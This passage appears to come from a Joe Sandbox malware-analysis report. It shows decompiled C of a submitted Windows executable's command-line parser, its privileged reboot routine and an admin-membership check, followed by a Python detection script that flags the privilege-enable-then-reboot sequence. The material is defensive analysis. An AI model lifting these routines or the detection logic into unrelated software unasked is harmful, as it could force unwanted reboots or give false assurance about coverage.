			_t167 = (0 | _v265 == 0x00000022) + 3; // 0x22 == '"': offset is 3, or 4 when a quote follows
			_t215 = &_v268 + _t167;
			_t183 = &_v268 + _t167;
			_t50 = _t183 + 1; // 0x1
			_t202 = _t50;
			do { // scan to the terminating NUL
				_t88 = *_t183;
				_t183 = _t183 + 1;
			} while (_t88 != 0);
			if(_t183 == _t202) { // nothing after the offset
				goto L49;
			} else {
				_t205 = 0x5b; // '['
				if(E0040667F(_t215, _t205) == 0) {
					L115:
					_t206 = 0x5d; // ']'
					if(E0040667F(_t215, _t206) == 0) {
						L117:
						_t202 = &_v276;
						_v276 = _t167;
						if(E00405C17(_t215, &_v276) == 0) {
							goto L49;
						} else {
							_t202 = 0x104; // 0x104 == 260 == MAX_PATH
							E00401680(0x408c42, 0x104, _v276 + _t167 + &_v268);
						}
					} else {
						_t202 = 0x5b; // '['
						if(E0040667F(_t215, _t202) == 0) {
							goto L49;
						} else {
							goto L117;
						}
					}
				} else {
					_t202 = 0x5d; // ']'
					if(E0040667F(_t215, _t202) == 0) {
						goto L49;
					} else {
						goto L115;
					}
				}
			}
		}
	} else {
		*0x408a24 = 1; // global flag in the image
	}
	goto L50;
} else {
	_t100 = _t87 - 1;
	if(_t100 == 0) {
		L98:
		if(_v266 != 0x3a) { // ':'
			goto L49;
		} else {
			_t170 = (0 | _v265 == 0x00000022) + 3; // 0x22 == '"': offset is 3, or 4 when a quote follows
			_t217 = &_v268 + _t170;
			_t192 = &_v268 + _t170;
			_t38 = _t192 + 1; // 0x1
			_t202 = _t38;
			do { // scan to the terminating NUL
				_t101 = *_t192;
				_t192 = _t192 + 1;
			} while (_t101 != 0);
			if(_t192 == _t202) { // nothing after the offset
				goto L49;
			} else {
				_t202 = &_v276;
				_v276 = _t170;
				if(E00405C17(_t217, &_v276) == 0) {
					goto L49;
				} else {
					_t104 = CharUpperA(_v267);
					_t218 = 0x408b3e;
					_t105 = _v276;
					if(_t104 != 0x54) { // 'T'
						_t218 = 0x408a3a;
					}
					E00401680(_t218, 0x104, _t105 + _t170 + &_v268); // 0x104 == MAX_PATH
					_t202 = 0x104;
					E0040658A(_t218, 0x104, 0x401140);
					if(E004031E0(_t218) != 0) {
						goto L50;
					} else {
						goto L106;
					}
				}
			}
		}
	} else {
		_t111 = _t100 - 0xa;
		if(_t111 == 0) {
			if(_v266 != 0) {
				if(_v266 != 0x3a) { // ':'
					goto L49;
				} else {
					_t199 = _v265;
					if(_t199 != 0) {
						_t219 = &_v265;
						do { // one flag per character until NUL
							_t219 = _t219 + 1;
							_t115 = CharUpperA(_t199) - 0x45; // 'E'
							if(_t115 == 0) {
								*0x408a2c = 1; // global flag in the image
							} else {
								_t200 = 2;
								_t119 = _t115 - _t200;
								if(_t119 == 0) { // 0x45 + 2 == 0x47 == 'G'
									*0x408a30 = 1; // global flag in the image
								} else {
									if(_t119 == 0xf) { // 0x47 + 0xf == 0x56 == 'V'
										*0x408a34 = 1; // global flag in the image
									} else {
										_t209 = 0;
									}
								}
							}
							_t118 = *_t219;
							_t199 = _t118;
						} while (_t118 != 0);
					}
				}
			} else {
				*0x408a2c = 1; // global flag in the image
			}
			goto L50;
		} else {
			_t127 = _t111 - 3;
			if(_t127 == 0) {
				if(_v266 != 0) {
					if(_v266 != 0x3a) { // ':'
						goto L49;
					} else {
						_t129 = CharUpperA(_v265);
						if(_t129 == 0x31) { // '1'
							goto L76;
						} else {
							if(_t129 == 0x41) { // 'A'
								goto L83;
                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                    																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                    																				goto L76;
                                                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                                                    																				goto L49;
                                                                                                                                                                                                                                    																			}
                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																L76:
                                                                                                                                                                                                                                    																_push(2);
                                                                                                                                                                                                                                    																_pop(1);
                                                                                                                                                                                                                                    																L83:
                                                                                                                                                                                                                                    																 *0x408a38 = 1;
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    															goto L50;
                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                    															_t132 = _t127 - 1;
                                                                                                                                                                                                                                    															if(_t132 == 0) {
                                                                                                                                                                                                                                    																if(_v266 != 0) {
                                                                                                                                                                                                                                    																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                    																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                    																			goto L49;
                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		_t201 = _v265;
                                                                                                                                                                                                                                    																		 *0x409a2c = 1;
                                                                                                                                                                                                                                    																		if(_t201 != 0) {
                                                                                                                                                                                                                                    																			_t220 =  &_v265;
                                                                                                                                                                                                                                    																			do {
                                                                                                                                                                                                                                    																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                    																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                    																				if(_t142 == 0) {
                                                                                                                                                                                                                                    																					_t143 = 2;
                                                                                                                                                                                                                                    																					 *0x409a2c =  *0x409a2c | _t143;
                                                                                                                                                                                                                                    																					goto L70;
                                                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                                                    																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                    																					if(_t145 == 0) {
                                                                                                                                                                                                                                    																						 *0x408d48 =  *0x408d48 | 0x00000040;
                                                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                                                    																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                    																						if(_t146 == 0) {
                                                                                                                                                                                                                                    																							 *0x409a2c =  *0x409a2c & 0xfffffffd;
                                                                                                                                                                                                                                    																							goto L70;
                                                                                                                                                                                                                                    																						} else {
                                                                                                                                                                                                                                    																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                    																							if(_t147 == 0) {
                                                                                                                                                                                                                                    																								 *0x409a2c =  *0x409a2c & 0xfffffffe;
                                                                                                                                                                                                                                    																								goto L70;
                                                                                                                                                                                                                                    																							} else {
                                                                                                                                                                                                                                    																								_t149 = _t147;
                                                                                                                                                                                                                                    																								if(_t149 == 0) {
                                                                                                                                                                                                                                    																									 *0x408d48 =  *0x408d48 | 0x00000080;
                                                                                                                                                                                                                                    																								} else {
                                                                                                                                                                                                                                    																									if(_t149 == 3) {
                                                                                                                                                                                                                                    																										 *0x409a2c =  *0x409a2c | 0x00000004;
                                                                                                                                                                                                                                    																										L70:
                                                                                                                                                                                                                                    																										 *0x408a28 = 1;
                                                                                                                                                                                                                                    																									} else {
                                                                                                                                                                                                                                    																										_t209 = 0;
                                                                                                                                                                                                                                    																									}
                                                                                                                                                                                                                                    																								}
                                                                                                                                                                                                                                    																							}
                                                                                                                                                                                                                                    																						}
                                                                                                                                                                                                                                    																					}
                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                    																				_t144 =  *_t220;
                                                                                                                                                                                                                                    																				_t201 = _t144;
                                                                                                                                                                                                                                    																			} while (_t144 != 0);
                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	 *0x409a2c = 3;
                                                                                                                                                                                                                                    																	 *0x408a28 = 1;
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    																goto L50;
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																if(_t132 == 0) {
                                                                                                                                                                                                                                    																	goto L98;
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	L49:
                                                                                                                                                                                                                                    																	_t209 = 0;
                                                                                                                                                                                                                                    																	L50:
                                                                                                                                                                                                                                    																	_t173 = _v272;
                                                                                                                                                                                                                                    																	if( *_t173 != 0) {
                                                                                                                                                                                                                                    																		goto L2;
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		break;
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											goto L106;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										L34:
                                                                                                                                                                                                                                    										_t209 = 0;
                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
						goto L131;
					}
					if( *0x408a2c != 0 &&  *0x408b3e == 0) {
						if(GetModuleFileNameA( *0x409a3c, 0x408b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E004066C8(0x408b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}
                                                                                                                                                                                                                                    0x00406143
                                                                                                                                                                                                                                    0x00406144
                                                                                                                                                                                                                                    0x0040614a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406150
                                                                                                                                                                                                                                    0x00406152
                                                                                                                                                                                                                                    0x0040615c
                                                                                                                                                                                                                                    0x00406170
                                                                                                                                                                                                                                    0x00406172
                                                                                                                                                                                                                                    0x0040617c
                                                                                                                                                                                                                                    0x00406190
                                                                                                                                                                                                                                    0x00406190
                                                                                                                                                                                                                                    0x00406196
                                                                                                                                                                                                                                    0x004061a5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004061ab
                                                                                                                                                                                                                                    0x004061b9
                                                                                                                                                                                                                                    0x004061c6
                                                                                                                                                                                                                                    0x004061c6
                                                                                                                                                                                                                                    0x0040617e
                                                                                                                                                                                                                                    0x00406180
                                                                                                                                                                                                                                    0x0040618a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040618a
                                                                                                                                                                                                                                    0x0040615e
                                                                                                                                                                                                                                    0x00406160
                                                                                                                                                                                                                                    0x0040616a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040616a
                                                                                                                                                                                                                                    0x0040615c
                                                                                                                                                                                                                                    0x0040614a
                                                                                                                                                                                                                                    0x0040610b
                                                                                                                                                                                                                                    0x0040610e
                                                                                                                                                                                                                                    0x0040610e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e59
                                                                                                                                                                                                                                    0x00405e59
                                                                                                                                                                                                                                    0x00405e5c
                                                                                                                                                                                                                                    0x0040604f
                                                                                                                                                                                                                                    0x00406056
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040605c
                                                                                                                                                                                                                                    0x0040606e
                                                                                                                                                                                                                                    0x00406071
                                                                                                                                                                                                                                    0x00406073
                                                                                                                                                                                                                                    0x00406075
                                                                                                                                                                                                                                    0x00406075
                                                                                                                                                                                                                                    0x00406078
                                                                                                                                                                                                                                    0x00406078
                                                                                                                                                                                                                                    0x0040607a
                                                                                                                                                                                                                                    0x0040607b
                                                                                                                                                                                                                                    0x00406081
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406087
                                                                                                                                                                                                                                    0x00406087
                                                                                                                                                                                                                                    0x0040608d
                                                                                                                                                                                                                                    0x0040609c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004060a2
                                                                                                                                                                                                                                    0x004060aa
                                                                                                                                                                                                                                    0x004060b2
                                                                                                                                                                                                                                    0x004060b7
                                                                                                                                                                                                                                    0x004060bd
                                                                                                                                                                                                                                    0x004060bf
                                                                                                                                                                                                                                    0x004060bf
                                                                                                                                                                                                                                    0x004060d6
                                                                                                                                                                                                                                    0x004060e0
                                                                                                                                                                                                                                    0x004060e7
                                                                                                                                                                                                                                    0x004060f5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004060f5
                                                                                                                                                                                                                                    0x0040609c
                                                                                                                                                                                                                                    0x00406081
                                                                                                                                                                                                                                    0x00405e62
                                                                                                                                                                                                                                    0x00405e62
                                                                                                                                                                                                                                    0x00405e65
                                                                                                                                                                                                                                    0x00405fd3
                                                                                                                                                                                                                                    0x00405fe9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405fef
                                                                                                                                                                                                                                    0x00405fef
                                                                                                                                                                                                                                    0x00405ff7
                                                                                                                                                                                                                                    0x00405ffd
                                                                                                                                                                                                                                    0x00406003
                                                                                                                                                                                                                                    0x00406006
                                                                                                                                                                                                                                    0x00406011
                                                                                                                                                                                                                                    0x00406014
                                                                                                                                                                                                                                    0x0040603d
                                                                                                                                                                                                                                    0x00406016
                                                                                                                                                                                                                                    0x00406018
                                                                                                                                                                                                                                    0x00406019
                                                                                                                                                                                                                                    0x0040601b
                                                                                                                                                                                                                                    0x00406033
                                                                                                                                                                                                                                    0x0040601d
                                                                                                                                                                                                                                    0x00406020
                                                                                                                                                                                                                                    0x00406029
                                                                                                                                                                                                                                    0x00406022
                                                                                                                                                                                                                                    0x00406022
                                                                                                                                                                                                                                    0x00406022
                                                                                                                                                                                                                                    0x00406020
                                                                                                                                                                                                                                    0x0040601b
                                                                                                                                                                                                                                    0x00406042
                                                                                                                                                                                                                                    0x00406044
                                                                                                                                                                                                                                    0x00406046
                                                                                                                                                                                                                                    0x0040604a
                                                                                                                                                                                                                                    0x00405ff7
                                                                                                                                                                                                                                    0x00405fd5
Control-flow graph view: only the basic-block address column of the graph survived extraction (addresses span 0x00405d00 to 0x00406200; 0x00000000 entries carry no address).

APIs
• CharNextA.USER32(?,00000000,?,?), ref: 00405CEE
• GetModuleFileNameA.KERNEL32(00408B3E,00000104,00000000,?,?), ref: 00405DFC
• CharUpperA.USER32(?), ref: 00405E3E
• CharUpperA.USER32(-00000052), ref: 00405EE1
• CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00405F6F
• CharUpperA.USER32(?), ref: 00405FA7
• CharUpperA.USER32(-0000004E), ref: 00406008
• CharUpperA.USER32(?), ref: 004060AA
• CloseHandle.KERNEL32(00000000,00401140,00000000,00000040,00000000), ref: 004061F1
• ExitProcess.KERNEL32 ref: 004061F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
• String ID: "$"$:$RegServer
• API String ID: 1203814774-25366791
• Opcode ID: 12c5ede7d68d4361fc545a2339da1b738b8745ab16626e3584918b88019fd5b3
• Instruction ID: 3f853014ee877d2515ec6058bf9da6422bf58f592a71eae056d1935db408f189
• Opcode Fuzzy Hash: 12c5ede7d68d4361fc545a2339da1b738b8745ab16626e3584918b88019fd5b3
• Instruction Fuzzy Hash: B0D11771A04A455AEB358B388D487BB3B61EB16304F1440BBD8CAF62D1D67C8E82CF4D
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 60%
			// Reboot routine as recovered by the decompiler. Flow: the function does nothing unless bit 1 of
			// __ecx is set or E00401EA7(__ecx) returns 2; unless bit 2 of __ecx is set it first asks the user
			// via E004044B9 (string ID 0x522) and requires the answer 6 (IDYES). If the global at 0x409a40 is
			// non-zero, SeShutdownPrivilege is enabled on the process token before ExitWindowsEx(EWX_REBOOT);
			// otherwise ExitWindowsEx(2, 0) is called directly. Failure string IDs: 0x4f5 (OpenProcessToken),
			// 0x4f6 (AdjustTokenPrivileges returned 0), 0x4f7 (ExitWindowsEx).
			E00401F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;                           // overlays _v24.Privileges[0].Attributes (see below)
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;                         // process token handle
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {   // bit 2 set: skip the confirmation prompt
						L14:
						if( *0x409a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x408004; // 0x8f135e3b
							_v8 = _t13 ^ _t46;   // looks like the /GS stack-cookie setup; E00406CE0 at the return would then be the cookie check
							_push(_t38);
							// 0x28 = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;   // Privileges[0].Attributes = SE_PRIVILEGE_ENABLED
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									// 2 = EWX_REBOOT; the decompiler did not recover the second argument
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);   // 0x10 would be MB_ICONERROR if E004044B9 wraps MessageBox (inference, not confirmed by the report)
								_push(0);
								_push(0);
								E004044B9(0, _t37);   // report the error string ID selected above
								_t25 = 0;
							}
							_pop(_t40);
							return E00406CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);   // EWX_REBOOT without enabling the privilege first
							goto L16;
						}
					} else {
						_t37 = 0x522;
						// 0x40 and 4 match MB_ICONINFORMATION and MB_YESNO, and 6 == IDYES, so E004044B9 is
						// probably a message-box wrapper keyed by string ID (inference, not confirmed by the report)
						_t28 = E004044B9(0, 0x522, 0x401140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00401EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}
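The decompiled routine above enables SeShutdownPrivilege on its own token and then calls ExitWindowsEx(EWX_REBOOT); the "APIs" list further up shows the bullet format in which Joe Sandbox logs each call site. The following Python is an added example, not part of this report and not code from the sample: it parses that bullet format into records and walks them for the OpenProcessToken(TOKEN_ADJUST_PRIVILEGES) -> LookupPrivilegeValue("SeShutdownPrivilege") -> AdjustTokenPrivileges -> ExitWindowsEx chain, decoding the reboot flags. The line regex, the module names and the ref addresses in the constructed reboot lines are assumptions made for illustration; the report lines are copied from the list above.

```python
"""Parse Joe Sandbox "APIs" bullet lines and flag a privilege-enable-then-reboot chain.
Added example: not part of the Joe Sandbox report and not code from the sample.
The line regex, the module names and the ref addresses in the constructed lines
below are assumptions made for illustration.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed line shape: "• Name.MODULE(arg,arg,...), ref: 00405CEE" (ExitProcess shows the args may be absent).
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<name>\w+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_IMM = re.compile(r"^-?[0-9A-Fa-f]{1,8}$")

TOKEN_ADJUST_PRIVILEGES = 0x20  # winnt.h
EWX_FLAGS = {  # winuser.h; EWX_LOGOFF is the all-bits-clear case
    0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE", 0x8: "EWX_POWEROFF",
    0x10: "EWX_FORCEIFHUNG", 0x40: "EWX_RESTARTAPPS", 0x400000: "EWX_HYBRID_SHUTDOWN",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int  # call-site address logged by the sandbox


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn report bullet lines into ApiCall records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def hex_arg(args: List[str], index: int) -> Optional[int]:
    """Decode argument `index` as a hex immediate; None for '?' or string args (all-hex-letter strings would be misread)."""
    if index >= len(args) or not HEX_IMM.match(args[index]):
        return None
    return int(args[index], 16)


def decode_ewx(flags: Optional[int]) -> List[str]:
    """Name the ExitWindowsEx flag bits that are set."""
    if flags is None:
        return []
    names = sorted(n for bit, n in EWX_FLAGS.items() if flags & bit)
    return names or ["EWX_LOGOFF"]


def find_privileged_reboot(calls: List[ApiCall]) -> Optional[dict]:
    """Walk the calls in call-site order looking for OpenProcessToken(TOKEN_ADJUST_PRIVILEGES) ->
    LookupPrivilegeValue*("SeShutdownPrivilege") -> AdjustTokenPrivileges -> ExitWindowsEx.
    Sorting by address can interleave different functions, so treat a hit as a triage lead."""
    stage = 0
    for c in sorted(calls, key=lambda call: call.ref):
        if stage == 0 and c.name == "OpenProcessToken":
            access = hex_arg(c.args, 1)
            if access is not None and access & TOKEN_ADJUST_PRIVILEGES:
                stage = 1
        elif stage == 1 and c.name.startswith("LookupPrivilegeValue"):
            if any("SeShutdownPrivilege" in a for a in c.args):
                stage = 2
        elif stage == 2 and c.name == "AdjustTokenPrivileges":
            stage = 3
        elif stage == 3 and c.name == "ExitWindowsEx":
            return {"ref": c.ref, "flags": decode_ewx(hex_arg(c.args, 0))}
    return None


# Copied from the report's "APIs" list above (the command-line parsing routine).
REPORT_API_LINES = """\
• CharNextA.USER32(?,00000000,?,?), ref: 00405CEE
• GetModuleFileNameA.KERNEL32(00408B3E,00000104,00000000,?,?), ref: 00405DFC
• CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00405F6F
• CloseHandle.KERNEL32(00000000,00401140,00000000,00000040,00000000), ref: 004061F1
• ExitProcess.KERNEL32 ref: 004061F8
"""

# Constructed in the same format from the calls visible in the E00401F90 decompile;
# modules and ref addresses are placeholders, not values taken from the report.
CONSTRUCTED_REBOOT_LINES = """\
• GetCurrentProcess.KERNEL32 ref: 00401F00
• OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?), ref: 00401F0C
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00401F2E
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00401F46
• CloseHandle.KERNEL32(?), ref: 00401F4D
• ExitWindowsEx.USER32(00000002,00000000), ref: 00401F60
"""
```

Running `find_privileged_reboot(parse_api_lines(REPORT_API_LINES))` returns None (the command-line routine never touches the token), while the constructed stream returns the ExitWindowsEx call site with flags `["EWX_REBOOT"]`. The rule deliberately requires the privilege-enable steps before ExitWindowsEx: a bare ExitWindowsEx, as in the unprivileged branch of the decompile, is too common in legitimate installers to be worth an alert on its own.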
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401f64
                                                                                                                                                                                                                                    0x00401f0e
                                                                                                                                                                                                                                    0x00401f0e
                                                                                                                                                                                                                                    0x00401f13
                                                                                                                                                                                                                                    0x00401f13
                                                                                                                                                                                                                                    0x00401f14
                                                                                                                                                                                                                                    0x00401f14
                                                                                                                                                                                                                                    0x00401f16
                                                                                                                                                                                                                                    0x00401f17
                                                                                                                                                                                                                                    0x00401f1a
                                                                                                                                                                                                                                    0x00401f1f
                                                                                                                                                                                                                                    0x00401f1f
                                                                                                                                                                                                                                    0x00401f86
                                                                                                                                                                                                                                    0x00401f8f
                                                                                                                                                                                                                                    0x00401fcf
                                                                                                                                                                                                                                    0x00401fd3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401fd3
                                                                                                                                                                                                                                    0x00401fa9
                                                                                                                                                                                                                                    0x00401fb4
                                                                                                                                                                                                                                    0x00401fbb
                                                                                                                                                                                                                                    0x00401fc3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401fc3
                                                                                                                                                                                                                                    0x00401f9a
                                                                                                                                                                                                                                    0x00401f9a
                                                                                                                                                                                                                                    0x00401fa2
                                                                                                                                                                                                                                    0x00401fd9
                                                                                                                                                                                                                                    0x00401fda
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401fa2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00401EFB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00401F02
                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00401FD3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                    • Opcode ID: a0f9794e17a2a2020f6724e084c01d69b3cf6ca5b21d9c9fc784dfd5cae79e59
                                                                                                                                                                                                                                    • Instruction ID: 05ee149af66cfd38363aee8e227656f8d8a40696282e74b864cdd5f9a16ea6ab
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0f9794e17a2a2020f6724e084c01d69b3cf6ca5b21d9c9fc784dfd5cae79e59
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 972176B1A402066ADB205BA19D4AF7F76B8EBC5714F10003AFB06F61E1D77D8811966E
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                                                    			E004017EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				short _v12;
                                                                                                                                                                                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t14 =  *0x408004; // 0x8f135e3b
                                                                                                                                                                                                                                    				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                    				_v12 = 0x500;
                                                                                                                                                                                                                                    				_t37 = __ecx;
                                                                                                                                                                                                                                    				_v16.Value = 0;
                                                                                                                                                                                                                                    				_v28 = __ecx;
                                                                                                                                                                                                                                    				_t28 = 0;
                                                                                                                                                                                                                                    				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                                                    					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                    					_v20 = _t20;
                                                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                                                    						 *_t37 = 0;
                                                                                                                                                                                                                                    						_t28 = 1;
                                                                                                                                                                                                                                    						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                    							_t37 = _t39;
                                                                                                                                                                                                                                    							 *0x40a288(0, _v24, _v28);
                                                                                                                                                                                                                                    							_v20();
                                                                                                                                                                                                                                    							if(_t39 != _t39) {
                                                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							FreeSid(_v24);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
